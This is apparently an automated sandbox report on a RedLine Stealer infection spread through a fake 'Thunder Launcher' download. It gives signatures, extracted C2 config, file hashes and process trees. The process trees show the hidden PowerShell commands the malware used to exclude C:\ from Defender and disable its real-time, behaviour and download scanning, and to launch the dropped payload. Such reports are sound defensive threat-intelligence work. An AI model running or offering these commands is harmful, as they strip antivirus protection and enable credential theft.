Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
96s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
14/07/2024, 14:33
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://goo.su/xQHo
Resource
win10v2004-20240709-en
General
-
Target
https://goo.su/xQHo
Malware Config
Extracted
redline
6951125327
https://t.me/+7Lir0e4Gw381MDhi*https://steamcommunity.com/profiles/76561199038841443
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/4652-469-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell and hide display window.
pid Process 4784 Powershell.exe 836 Powershell.exe 3468 Powershell.exe 4360 Powershell.exe 2456 Powershell.exe 460 powershell.exe 4360 Powershell.exe 4240 powershell.exe 4816 powershell.exe 4052 powershell.exe 3032 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 1636 1720967645459.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1636 set thread context of 4652 1636 1720967645459.exe 133 -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 51 IoCs
pid Process 116 msedge.exe 116 msedge.exe 4408 msedge.exe 4408 msedge.exe 2816 identity_helper.exe 2816 identity_helper.exe 4312 msedge.exe 4312 msedge.exe 4360 Powershell.exe 4360 Powershell.exe 4784 Powershell.exe 4784 Powershell.exe 2456 Powershell.exe 2456 Powershell.exe 836 Powershell.exe 836 Powershell.exe 2456 Powershell.exe 4784 Powershell.exe 4360 Powershell.exe 836 Powershell.exe 3032 powershell.exe 3032 powershell.exe 4052 powershell.exe 4052 powershell.exe 4816 powershell.exe 4816 powershell.exe 4240 powershell.exe 4240 powershell.exe 3032 powershell.exe 4240 powershell.exe 4052 powershell.exe 4816 powershell.exe 3468 Powershell.exe 3468 Powershell.exe 460 powershell.exe 460 powershell.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe 4652 RegAsm.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 4784 Powershell.exe Token: SeDebugPrivilege 2456 Powershell.exe Token: SeDebugPrivilege 4360 Powershell.exe Token: SeDebugPrivilege 836 Powershell.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe Token: SeDebugPrivilege 4240 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 3468 Powershell.exe Token: SeDebugPrivilege 460 powershell.exe Token: SeDebugPrivilege 4652 RegAsm.exe -
Suspicious use of FindShellTrayWindow 47 IoCs
pid Process 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe 4408 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4348 javaw.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4408 wrote to memory of 3684 4408 msedge.exe 84 PID 4408 wrote to memory of 3684 4408 msedge.exe 84 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 2168 4408 msedge.exe 87 PID 4408 wrote to memory of 116 4408 msedge.exe 88 PID 4408 wrote to memory of 116 4408 msedge.exe 88 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89 PID 4408 wrote to memory of 1828 4408 msedge.exe 89
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://goo.su/xQHo1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf47182⤵PID:3684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:22⤵PID:2168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:82⤵PID:1828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:4088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:12⤵PID:4772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:82⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5528 /prefetch:82⤵PID:4736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:12⤵PID:1160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,11329981710523629047,7490461251835884679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4312
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2216
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4316
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3464
-
C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"C:\Users\Admin\Downloads\Thunder Launcher v4.2\Thunder Setup.exe"1⤵PID:2316
-
C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe"C:\Users\Admin\Downloads\Thunder Launcher v4.2\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher2⤵
- Suspicious use of SetWindowsHookEx
PID:4348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Start-Process "C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe"'}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Start-Process C:\Users\Admin\AppData\Local\Temp\/1720967645459.exe4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:460 -
C:\Users\Admin\AppData\Local\Temp\1720967645459.exe"C:\Users\Admin\AppData\Local\Temp\1720967645459.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1636 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4500
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
152B
MD58dc45b70cbe29a357e2c376a0c2b751b
SHA125d623cea817f86b8427db53b82340410c1489b2
SHA256511cfb6bedbad2530b5cc5538b6ec2184fc4f85947ba4c8166d0bb9f5fe2703a
SHA5123ce0f52675feb16d6e62aae1c50767da178b93bdae28bacf6df3a2f72b8cc75b09c5092d9065e0872e5d09fd9ffe0c6931d6ae1943ddb1927b85d60659ef866e
-
Filesize
152B
MD51790c766c15938258a4f9b984cf68312
SHA115c9827d278d28b23a8ea0389d42fa87e404359f
SHA2562e3978bb58c701f3c6b05de9349b7334a194591bec7bcf73f53527dc0991dc63
SHA5122682d9c60c9d67608cf140b6ca4958d890bcbc3c8a8e95fcc639d2a11bb0ec348ca55ae99a5840e1f50e5c5bcf3e27c97fc877582d869d98cc4ea3448315aafb
-
Filesize
20KB
MD55d3da8e9ab09ced1e70bbdb7f08d6d7a
SHA16c775119468cf2708e56763950eafb58dae0a3f4
SHA2563a3dfe5f88d485cd08342a9aab67f9332afb309830ec74e86d13f10e985b87dc
SHA5121caca15c1653fe34e83e69ae730d8d84ea57baa042fb203166dc2167130e0420862faae41942bf9a0fb1a09dbefacd2a519661cc19c4e6fe88a9d8d601fc70b6
-
Filesize
250B
MD5f59173bd6bae4225216d91afe48b6017
SHA19231eee8b25e96dcc0d58267cab3cc12130b82d9
SHA25600f46a4416df2f1d9af4fdf0fe9765ae0fa62fa34c590243b002da927d1ba9dc
SHA512c17a4d40f409dc874fd77b0e9fff36602fb7cc640868ee877a12819e01169fac3a15fdf21a9d06a128c2352046c6d9545b51544b7997c2123a9d2c8bac88cc7b
-
Filesize
6KB
MD5766815394ec267c2326059e3dbc23cd5
SHA1f1f0fe419b29305a631c7591d0f376bf7c1cee80
SHA256a6f370ab89678b2f7a172ae05007c8cf9fc3491f6fab1890bb3e0d7491db08d7
SHA512cf764847de9d9696ac99439f71890431dee815821304117a78b8549d71e69effbfd822aa2767087eae335201e529c52ebac99d1fcc04947a46527b9a5b6b11bf
-
Filesize
6KB
MD52b4cbab8701d4200290de14bbe77e77e
SHA1561dcd7361045ed84248bb3ce031934ece40ed09
SHA256d5cefbef2dfcfbbb7a2feb72351bdbd2a6f12ecc90e349da745089202c9ae8f1
SHA512f66d1bb75f737fe47608b48f4e82c1c73961d70e9ce9cf7338d5ba653109a82863c135ac5979c19818e415989571193726ca31e4cfabae60cd0e23321a9334c4
-
Filesize
6KB
MD506e4538e1224a04a8a3763fd371bc44a
SHA189444b13d31eda3780050e1aea12c902a5e723d2
SHA25636dc28b1f8b3de65b761150c373fbe441868b97d81e7b55c263735e1b6d20126
SHA512e35a762d413aec5b6de7e6c658dd41daa28c2513bcd6a360306b0d6512c7dffa083ea4bd37b215d4fc78287eb33a33e953af029263f75874d40019eecc50513d
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD55b77ea6614486fa9082661f1f7d37c27
SHA16e51bf491e35a6659694e62ca8dd27cdc30c8d2a
SHA256da899b1ce0fc127cdacfe489d2dc211eb94cefa71cf87ed849697fa43194acdb
SHA512c672ca111f9c50e7a15ca6153c46aab6f07e701dda225c4490e637e74322a89e53b49d267a71a13aaf5e309b21dc9e0328e7b1aac1565fe6085a5984b8768f9c
-
Filesize
11KB
MD58f34b4bb777c1a0986c47a9a997f9c90
SHA1f35b2fa6873ec2ff50be5bebb949acf2064602f7
SHA256ab9772ed963566e5f085686165a6e5f4901d2de6c5c3024571c77df51bb9737e
SHA512327f683487c1a8672b311979fa05cec0d9b690ad965dde3d1e550e8073763b6c2ce9997867154b9492f5a384178594be200a0d9d301708c71867ee480b61e5b2
-
Filesize
15KB
MD5ab9e666fbf81d1bade718a9d090b3cc8
SHA1336d4418791cf3a3a43747b2cbce64d27e6f9eb2
SHA256ab9b8fb9bda51953b5639dcb82b2ab5169277f9f30e801c3959d7db6337b19ea
SHA512ad77405dd1dd5a5100df00d4f92aa11a075b32be8e10fee633fcb8338f21dc11edeb4b7a1274dd48d8f2e468d816486aad033f8270fe9d1aacce4048bd2c0b98
-
Filesize
15KB
MD52436b635cfbbcb083b5b822bbbd1766f
SHA13c685c7d704905eb2ebe8868d1c4fbf77a260df5
SHA2564b1be1a64fd793be2dcbf17aadbf17efe219564e988c85c8113d58028cdd0c54
SHA51299cc64e67999f6c1e65cb6e9062a30bd7fa133a11230e28aaa4a01b7f05ea7e48ffc3c727c7eabd55d53be505d8a97c29181839b8977fa81a41cb9eb7e88b21f
-
Filesize
18KB
MD5c71a8dc614d33487d936e8dc24c16c14
SHA108c231d3f620af564102c38d588f1b9cf88c1b22
SHA256de2bdf4372ec3d859d2d34d8bf18566318c71e828bf765253e0442e2544645c6
SHA5129e49ce3152ed1a992b8b0c3e47cf083499cc73ad7a5310455d1eb7abcdba8fb4910cf926633aabde8ef7780d80812298d72537b575c916ca7af6cc6737f7d7f3
-
Filesize
64B
MD503d69955495ed2d4ed4c66035227ffb5
SHA189bc196457ca1307fa4a6f6d7aaf0bc96b017063
SHA256e207712d8b59f3f25846a7f0df052cbf731ca9a8f203e0ab621b26cc64ce3c3e
SHA512de04d9fcfd8e053884a786d73237bc77d8d545f8f6b10a4672bf774a3d378b6626c419013e5c4b7be657466dd5695b22f902a4007b341e2d58415fde8e9bf06a
-
Filesize
18KB
MD5b193dba84e0315043c23544303b6ab6b
SHA10ffc2d7f2cde07d85d92f513efc1736eb4cccf15
SHA2560e9369af5430d970e568d31495d042e36a7f0f4d0c01303fd444372bc7946850
SHA512a8b95d6912ae6fb4942a24b6aadb18d875b5ba38ec779f2fbe8227c62f9580df0ea856e6e3507a5c3279694f431d0c1791ab35331d197741b93ed4c90cefbfe5
-
Filesize
15KB
MD5d5129ceb34356797ee4592ade484f308
SHA1603405f89b7ac1f18c7fbdbcc64e490a43809219
SHA256cdd9c0a823e8e20d2523be31ac4637088e6e518aac3fd2a6d5a622bd3ce45e67
SHA5126cd350d22f361eb401225154951cd597a1f1e10a9776305182b5c77cae6193c9da8e54b15c2beadaaedea75c70be34460396bf917d4286958915a0db3c6372ae
-
Filesize
765KB
MD5b4415b066e4dac6fb6849d0237bcdcf9
SHA1d089566c069035f0f4ba147984d738114ba6ee90
SHA2563b30eb80b02910f592f5aa93e22af80b5e178785484e24b975892c0403073506
SHA51223291fbd5ff5e201209e9d034bbc87108b535cdec4a97b33e7934f974730eddecb4806d107518d1ec0a311d842a41b575eb8264d2ca23952c5337e97c0b4dc26
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82